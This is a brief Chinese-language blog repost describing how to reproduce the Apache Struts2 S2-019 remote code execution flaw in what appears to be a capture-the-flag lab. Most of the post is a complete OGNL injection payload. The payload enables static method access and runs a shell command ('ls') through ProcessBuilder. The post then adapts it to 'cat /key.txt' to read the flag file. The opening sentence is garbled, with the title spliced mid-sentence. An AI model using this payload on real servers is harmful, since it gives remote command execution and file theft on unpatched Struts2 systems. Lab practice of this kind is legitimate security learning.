動態方法調用是一種已知會施加可 Apache Struts2遠程代碼執行漏洞(S2-019)復現能的安全漏洞的機制，但到目前為止，它默認啟用，警告用戶應盡可能將其關閉。

S2-019的poc,是debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess’),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.ServletActionContext@getRequest(),#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{‘ls’})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[1000],#d.read(#e),#resp.println(#e),#resp.close()使用url編碼hackbar執行,得到key.txt所在的目錄

修改為cat /key.txt，進行url編碼，hackbar執行，得到key。

總結

以上是生活随笔為你收集整理的Apache Struts2远程代码执行漏洞(S2-019)复现的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。